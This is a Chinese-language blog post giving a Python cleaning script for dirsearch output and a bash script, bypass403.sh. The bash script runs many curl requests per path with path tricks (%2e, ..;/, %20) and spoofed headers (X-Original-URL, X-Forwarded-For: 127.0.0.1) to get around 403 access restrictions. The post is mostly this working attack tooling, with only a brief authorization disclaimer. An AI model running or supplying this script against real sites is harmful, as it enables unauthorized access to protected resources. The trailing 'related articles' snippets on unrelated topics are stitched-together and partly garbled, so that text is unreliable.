解放双手,批量绕过403

将dirsearch扫描出来的结果复制到url.txt,如下所示

url.txt

[21:18:16] 502 -    0B  - /var/log/exception.log
[21:18:21] 502 -    0B  - /WEB-INF/jetty-env.xml
[21:18:22] 502 -    0B  - /WEB-INF/weblogic.xml
[21:18:27] 502 -    0B  - /wp-json/wp/v2/users/
[21:18:27] 502 -    0B  - /wp-json/
[21:18:28] 502 -    0B  - /wuwu11.php
[21:18:29] 502 -    0B  - /wwwstats.htm
[21:18:29] 502 -    0B  - /xprober.php
[21:18:30] 502 -    0B  - /zehir.php

接下来利用python脚本对url.txt进行清洗

python q.py url.txt

q.py代码如下所示:

​import sys

# 读取文件并清洗路径
def clean_paths(file_path):
    cleaned_paths = []
    with open(file_path, 'r') as file:
        for line in file:
            # 提取路径部分
            path = line.split(' - ')[2].strip()
            # 二次清洗,去除路径两端的斜杠
            cleaned_path = path.strip('/')
            cleaned_paths.append(cleaned_path)
    return cleaned_paths

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python script.py <input_file>")
        sys.exit(1)

    input_file_path = sys.argv[1]
    output_file_path = 'path.txt'

    # 执行清洗路径函数
    cleaned_paths = clean_paths(input_file_path)

    # 将结果写入到path.txt文件中
    with open(output_file_path, 'w') as output_file:
        for path in cleaned_paths:
            output_file.write(path + '\n')

    print("清洗后的路径已写入到 path.txt 文件中。")

上面的脚本将清洗后的结果输出到path.txt

接着使用脚本bypass403.sh

bypass403.sh脚本内容如下:

#! /bin/bash
figlet Bypass-403
echo "By Iam_J0ker"
echo " "

# 检查是否提供了URL和路径文件
if [ -z "$1" ] || [ -z "$2" ]; then
    echo "使用方法: $0 <URL> <路径文件>"
    exit 1
fi

# 提取URL
url=$1
shift

# 检查路径文件是否存在且可读
if [ ! -f "$1" ]; then
    echo "未找到路径文件或不可读"
    exit 1
fi

# 显示URL
echo "URL: $url"

# 逐行读取路径文件中的路径
while IFS= read -r path; do
    # 显示路径
    echo "路径: $path"
    
    # 执行绕过技术
    echo " "
    echo "正在对 $url$path 执行绕过技术"
    echo " "

    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path"
    echo "  --> $url/$path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/%2e/$path"
    echo "  --> $url/%2e/$path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path/."
    echo "  --> $url/$path/."
    
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url//$path//"
    echo "  --> $url//$path//"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/./$path/./"
    echo "  --> $url/./$path/./"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Original-URL: $path" "$url/$path"
    echo "  --> $url/$path -H X-Original-URL: $path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Custom-IP-Authorization: 127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Custom-IP-Authorization: 127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: http://127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Forwarded-For: http://127.0.0.1"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-For: 127.0.0.1:80" "$url/$path"
    echo "  --> $url/$path -H X-Forwarded-For: 127.0.0.1:80"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-rewrite-url: $path" "$url"
    echo "  --> $url -H X-rewrite-url: $path"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path%20"
    echo "  --> $url/$path%20"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path%09"
    echo "  --> $url/$path%09"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path?"
    echo "  --> $url/$path?"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path.html"
    echo "  --> $url/$path.html"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path/?anything"
    echo "  --> $url/$path/?anything"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path#"
    echo "  --> $url/$path#"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "Content-Length:0" -X POST "$url/$path"
    echo "  --> $url/$path -H Content-Length:0 -X POST"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path/*"
    echo "  --> $url/$path/*"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path.php"
    echo "  --> $url/$path.php"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path.json"
    echo "  --> $url/$path.json"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE "$url/$path"
    echo "  --> $url/$path -X TRACE"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Host: 127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Host: 127.0.0.1"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path..;/"
    echo "  --> $url/$path..;/"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" "$url/$path;/"
    echo "  --> $url/$path;/"
    curl -k -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -X TRACE "$url/$path"
    echo "  --> $url/$path -X TRACE"
    curl -s -o /dev/null -iL -w "%{http_code}","%{size_download}" -H "X-Forwarded-Host: 127.0.0.1" "$url/$path"
    echo "  --> $url/$path -H X-Forwarded-Host: 127.0.0.1"
    echo "Way back machine:"
    curl -s  https://archive.org/wayback/available?url=$url/$path | jq -r '.archived_snapshots.closest | {available, url}'
    echo " "
done < "$1"

将上面这些文件均放在同文件夹下

用命令启动:

./bypass403.sh url pass.txt

从而达到批量绕过403的目的。

参考链接:

https://github.com/iamj0ker/bypass-403?tab=readme-ov-file

​以上目的只为了方便日常渗透测试,侵权请联系删除!!!未授权切勿进行渗透!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/618471.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【信号与系统 - 8】取样定理

1 定义 取样处理就是对连续信号的离散化处理 p ( t ) p(t) p(t) 是开关函数 f s ( t ) f ( t ) ⋅ p ( t ) f_s(t)f(t)\cdot p(t) fs​(t)f(t)⋅p(t) 当 p ( t ) p(t) p(t) 为周期矩形函数时 该取样为均匀抽样&#xff0c;周期为 T s T_s Ts​&#xff0c;则取样角频率为&…

一种驱动器的功能安全架构介绍

下图提供了驱动器实现安全功能的架构 具有如下特点&#xff1a; 1.通用基于总线或者非总线的架构。可以实现ethercat的FSOE&#xff0c;profinet的profisafe&#xff0c;或者伺服本体安全DIO现实安全功能。 2.基于1oo2D架构&#xff0c;安全等级可以达到sil3。 3.高可用性。单…

keil无法查看外设寄存器(生成SFR文件)

1.前言 自从更新了keil&#xff0c;用的是越来越不顺手了&#xff0c;一会是cannot evaluate&#xff0c;一会是与强制与cubemx强制联系了&#xff0c;这次也是的&#xff08;地铁&#xff0c;老人&#xff0c;手机&#xff09;折腾了一下总是搞好了&#xff08;网上的解法只能…

Google最新论文: 复杂的 Prompt 如何更好的调试?

本文介绍了Sequence Salience&#xff0c;这是一个专为调试复杂的大模型提示而设计的系统。该系统利用广泛使用的显著性方法&#xff0c;支持文本分类和单标记预测&#xff0c;并将其扩展到可处理长文本的调试系统。现有的工具往往不足以处理长文本或复杂提示的调试需求。尽管存…

InternlM2

第一次作业 基础作业 进阶作业 1. hugging face下载 2. 部署 首先&#xff0c;从github上git clone仓库 https://github.com/InternLM/InternLM-XComposer.git然后里面的指引安装环境

微信小程序开发遇到的奇奇怪怪的问题

新建项目发现顶部栏标题不生效问题 开发者工具新建项目默认开启全局Skyline渲染引擎&#xff0c;因为Skyline不支持原生导航栏&#xff0c;所以就没显示原生导航栏了。 如果想用回原生导航栏&#xff0c;可以把app.json里面的 "renderer": "skyline", 去掉…

Docker容器基本操作从入门到大牛

1. Docker安装部署 1.1 openEuler使用YUM安装 [rootnode1 ~]# yum install docker -y [rootnode1 ~]# docker version Client:Version: 18.09.0EulerVersion: 18.09.0.332API version: 1.39Go version: go1.17.3Git commit: 9942888Built…

自定义多数据源

多数据源 第一章 自定义多数据源 文章目录 多数据源前言一、先在配置文件中配置好多个数据源二、配置数据源的配置文件三、定义动态数据源配置1、自定义了Datasource&#xff0c;主要目的是为了在Spring容器中定义一个datasource的Bean&#xff0c;用于mybtais获取数据库连接使…

网络安全等级保护等级测评方案

软件全套资料包获取进主页。 ‘

DolphinScheduler2.x 伪分布式部署

文章目录 DolphinScheduler2.x 伪分布式部署QA DolphinScheduler2.x 伪分布式部署 DolphinScheduler 部署说明 1 软硬件环境要求 1.1 操作系统版本要求 操作系统版本Red Hat Enterprise Linux7.0 及以上CentOS7.0 及以上Oracle Enterprise Linux7.0 及以上Ubuntu LTS16.04 …

传统图机器学习的特征工程-全图

将整张图表示成为一个低维向量&#xff0c;反映全图的特征 key idea&#xff1a;Bag-of-Words&#xff08;BOW&#xff09;把图看作文章&#xff0c;把节点看作单词 Kernel mothods

实验8 内置对象session

一、实验目的 掌握怎样在JSP中使用内置对象session 二、实验项目内容&#xff08;实验题目&#xff09; 编写代码&#xff0c;掌握session的用法。【参考课本4.6.5 】 三、源代码以及执行结果截图&#xff1a; choiceGrade.jsp <% page language"java" content…